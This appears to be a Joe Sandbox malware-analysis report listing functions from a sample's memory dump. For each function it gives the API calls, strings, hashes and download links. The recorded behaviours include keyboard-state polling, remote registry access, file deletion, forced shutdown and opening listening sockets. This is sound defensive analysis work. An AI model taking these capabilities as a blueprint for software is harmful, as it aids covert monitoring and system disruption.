Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
API String ID: 0-3496363466
Opcode ID: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
Instruction ID: 2b8769ccf6cd5dc1a5c81dc2d2f2f37c5c4b0d775384f8cf0e68cbc1b8f50bc1
Opcode Fuzzy Hash: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
Instruction Fuzzy Hash: 0D729375E00229CBDF24CF59D8807AEB7B5FF44310F18816AE816EB690DB309E81DB90

Function 00C7001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C70097
SetKeyboardState.USER32(?), ref: 00C70102
GetAsyncKeyState.USER32(000000A0), ref: 00C70122
GetKeyState.USER32(000000A0), ref: 00C70139
GetAsyncKeyState.USER32(000000A1), ref: 00C70168
GetKeyState.USER32(000000A1), ref: 00C70179
GetAsyncKeyState.USER32(00000011), ref: 00C701A5
GetKeyState.USER32(00000011), ref: 00C701B3
GetAsyncKeyState.USER32(00000012), ref: 00C701DC
GetKeyState.USER32(00000012), ref: 00C701EA
GetAsyncKeyState.USER32(0000005B), ref: 00C70213
GetKeyState.USER32(0000005B), ref: 00C70221

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
Instruction ID: 9c33aa253cf5de62d2a507ccad2706161718b8885957b115b4978452b1f624bb
Opcode Fuzzy Hash: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
Instruction Fuzzy Hash: FD511C30904388A9FB35DBB088557EEBFB49F01380F58C59ED9DA561C3DAA49B8CC761

Function 00C903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C904AC

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C905E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C90822
RegCloseKey.ADVAPI32(00000000), ref: 00C9082F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: c9f63baae895f2569d3c5f48b03f41aef6f30915894c30a43cbeb8d7a82435e5
Instruction ID: d62c31c59639c07070e798e71a2cd469b87051a57050ad25fcff7533c89343d6
Opcode Fuzzy Hash: c9f63baae895f2569d3c5f48b03f41aef6f30915894c30a43cbeb8d7a82435e5
Instruction Fuzzy Hash: D0E15E31204214AFCB14DF24C895E6ABBF8EF89314F14856DF85ADB2A2DB30ED41DB91

Function 00C84164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C8418B
EmptyClipboard.USER32 ref: 00C84191
GlobalAlloc.KERNEL32(00000002,?), ref: 00C841A6
CloseClipboard.USER32 ref: 00C84245

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
Instruction ID: ef64fc2ee9a83592f7400b3c45776aa1c88eec94a25a0ffa927fe72b205f8741
Opcode Fuzzy Hash: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
Instruction Fuzzy Hash: 8021C1352006119FEB14AF24EC5DBAE7BA8FF05715F10802AF946DB2B1DB30AD42DB58

Function 00C737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770

Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32

FindFirstFileW.KERNEL32(?,?), ref: 00C738A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C7394B
MoveFileW.KERNEL32(?,?), ref: 00C7395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C7397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C739B9

Strings

\*.*, xrefs: 00C7384E, 00C73857, 00C7386C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 24b65d56edeb6782d54cf1bf196454e9dbdfc8cfb739097a5ebc208db71f5a9e
Instruction ID: bf65a899d5ecade7e9b1833911a7876bdd41af337a6daa7033ae4f9c58d4c6dc
Opcode Fuzzy Hash: 24b65d56edeb6782d54cf1bf196454e9dbdfc8cfb739097a5ebc208db71f5a9e
Instruction Fuzzy Hash: FB518E3180518CEACF05EBA0D9929EDB779AF15300F608169F41AB7191EF316F4AFB61

Function 00C7F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C7F440
Sleep.KERNEL32(0000000A), ref: 00C7F470
_wcscmp.LIBCMT ref: 00C7F484
_wcscmp.LIBCMT ref: 00C7F49F
FindNextFileW.KERNEL32(?,?), ref: 00C7F53D
FindClose.KERNEL32(00000000), ref: 00C7F553

Strings

*.*, xrefs: 00C7F425

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
Instruction ID: 2f45c2fcb38b6252fc2b93efc5e5c8080cf79afa2020127724f4ccb1f59c7966
Opcode Fuzzy Hash: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
Instruction Fuzzy Hash: F341517190021D9FCF54DF64DC89AEEBBB4FF05314F14856AE829A3191DB309A86EB50

Function 00C25760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C258A5
_memmove.LIBCMT ref: 00C258F5
_memmove.LIBCMT ref: 00C2595B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cea86db4f0e40f11499c481075a41ff23ed3b2d7acf0aaf17c93f772a731c0d3
Instruction ID: 53f9bb03c8bff162a031cece1b40f345e199ad600faa7d34cc8a4c6b1882a2af
Opcode Fuzzy Hash: cea86db4f0e40f11499c481075a41ff23ed3b2d7acf0aaf17c93f772a731c0d3
Instruction Fuzzy Hash: 5C129870A00619EFDF14DFA5D981AEEB3F5FF48300F204529E846A7290EB36AE55DB50

Function 00C73B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770

Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32

FindFirstFileW.KERNEL32(?,?), ref: 00C73B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C73BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C73BEA
FindClose.KERNEL32(00000000), ref: 00C73C01
FindClose.KERNEL32(00000000), ref: 00C73C0A

Strings

\*.*, xrefs: 00C73B5B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4bb926701bcee4cd3003a03ee1aec9f829a5c3e5cb7b09b6d6a6d3e20da85136
Instruction ID: 34f6dbe9be4e850be837568582e7a9c1db98ab8d714c405d6086a13fd2f39a49
Opcode Fuzzy Hash: 4bb926701bcee4cd3003a03ee1aec9f829a5c3e5cb7b09b6d6a6d3e20da85136
Instruction Fuzzy Hash: 6C318231008385DBC301EF24C8959EFB7A8BE96314F444E2DF4E992191EB25DA09F793

Function 00C751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865

ExitWindowsEx.USER32(?,00000000), ref: 00C751F9

Strings

SeShutdownPrivilege, xrefs: 00C751C9
@, xrefs: 00C751EC
, xrefs: 00C751E7

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
Instruction ID: 15b9e679ccc3246d7228e74456c2d3aecea06c6c09d7344bd2d24385ad0acbfc
Opcode Fuzzy Hash: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
Instruction Fuzzy Hash: 140126317916116BF72C6368AC8EFBF725CEB05341F218525F92FE20D3EAD21D0186A0

Function 00C86283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C862DC
WSAGetLastError.WSOCK32(00000000), ref: 00C862EB
bind.WSOCK32(00000000,?,00000010), ref: 00C86307
listen.WSOCK32(00000000,00000005), ref: 00C86316
WSAGetLastError.WSOCK32(00000000), ref: 00C86330
closesocket.WSOCK32(00000000,00000000), ref: 00C86344

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
Instruction ID: 2f18e5a9fe88123a01412c715452bdac81266a0c4952f14a1049108bd3c64fb0
Opcode Fuzzy Hash: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
Instruction Fuzzy Hash: 7D21D2306002049FDB10EF64C849BAEB7A9EF45324F148159E816E73E1C770AD41DB55

Function 00C25520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01

_memmove.LIBCMT ref: 00C60258
_memmove.LIBCMT ref: 00C6036D
_memmove.LIBCMT ref: 00C60414

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 1b87b0e79912398b72777094b2d7f45a408a99ea45473aebc440a69502bd8623
Instruction ID: 038b1928d71962b580a274661fa4c4e42dfc0c23a5ef7cbd0de9df32ac57bd23
Opcode Fuzzy Hash: 1b87b0e79912398b72777094b2d7f45a408a99ea45473aebc440a69502bd8623
Instruction Fuzzy Hash: 8802DF70A00219DBCF14DF64D981AAFBBF5EF44300F2480A9E80AEB355EB31DA54DB91

Function 00C11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00C119FA
GetSysColor.USER32(0000000F), ref: 00C11A4E
SetBkColor.GDI32(?,00000000), ref: 00C11A61

Part of subcall function 00C11290: DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
Instruction ID: 0047979ab0831e1bc62fdb4420b3276867fcbcd8df79764b38b8503d0bf9b36a
Opcode Fuzzy Hash: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
Instruction Fuzzy Hash: 9DA12971116545BEEA24AA2A5C48EFF296CEF43341F1C011AFF22D51D2CA29DE81B2B5

Function 00C86747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C8679E
WSAGetLastError.WSOCK32(00000000), ref: 00C867C7
bind.WSOCK32(00000000,?,00000010), ref: 00C86800
WSAGetLastError.WSOCK32(00000000), ref: 00C8680D
closesocket.WSOCK32(00000000,00000000), ref: 00C86821

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
Instruction ID: 2b89cce08ccda2a730cebbc1b01f611f1903b4e164b577d9b948587c5ca656be
Opcode Fuzzy Hash: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
Instruction Fuzzy Hash: 4941C575A00210AFEB50BF649C96FBE77E8DF06714F04845CF916AB3D2CA709D41A791

Function 00C95376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C953C5
IsWindowEnabled.USER32 ref: 00C953D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00C953E0
IsIconic.USER32 ref: 00C953EE
IsZoomed.USER32 ref: 00C953FC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
Instruction ID: 8b203d44bf1f9a473420d631c9255965b50e4f7a2fb5e1e3bc6b69ef8f4ebb65
Opcode Fuzzy Hash: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
Instruction Fuzzy Hash: 2511C4317009116FEF225F269C4CB6EBB98FF457A1B514029F846D3251CBB0DD42DBA0

Function 00C680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
Instruction ID: 0a5a7d7a702a65065b2838e2963de37bd3e059669c05e5b2ac29440ef84eb5a8
Opcode Fuzzy Hash: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
Instruction Fuzzy Hash: B8F04F31240204AFEB200FA5ECCDF6F3BACEF4A755B10012AF945C6160CE619D47EA60

Function 00C7C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C7C432
CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7C44A

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

CoUninitialize.OLE32 ref: 00C7C6B7

Strings

.lnk, xrefs: 00C7C3C6, 00C7C3EE, 00C7C3F8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
